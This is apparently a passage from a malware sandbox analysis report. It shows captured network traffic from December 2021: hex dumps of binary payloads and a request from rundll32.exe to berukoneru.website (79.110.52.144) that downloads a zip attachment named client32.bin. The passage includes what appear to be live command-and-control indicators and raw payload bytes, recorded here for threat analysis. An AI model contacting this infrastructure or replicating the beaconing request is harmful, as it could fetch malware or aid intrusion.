e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                            Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                            2021-12-14 09:21:39 UTC1229INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                            Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                            2021-12-14 09:21:39 UTC1245INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                            Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                            2021-12-14 09:21:39 UTC1261INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                            Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                            2021-12-14 09:21:39 UTC1277INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                            Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                            2021-12-14 09:21:39 UTC1293INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                            Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                            2021-12-14 09:21:39 UTC1309INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                            Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                            2021-12-14 09:21:39 UTC1325INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                            Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                            2021-12-14 09:21:39 UTC1341INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                            Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                            2021-12-14 09:21:39 UTC1357INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                            Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            6 | 192.168.2.6 | 49819 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:39 UTC | 1364 | OUT | GET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC | 1364 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 268426
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=enj917fogsgcgtjb5lnpbut920; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC1365INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                            Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                            2021-12-14 09:21:39 UTC1380INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                            Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                            2021-12-14 09:21:39 UTC1396INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                            Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                            2021-12-14 09:21:39 UTC1412INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                            Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                            2021-12-14 09:21:39 UTC1428INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                            Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                            2021-12-14 09:21:39 UTC1444INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                            Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                            2021-12-14 09:21:39 UTC1460INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                            Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                            2021-12-14 09:21:39 UTC1476INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                            Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                            2021-12-14 09:21:39 UTC1492INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                            Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
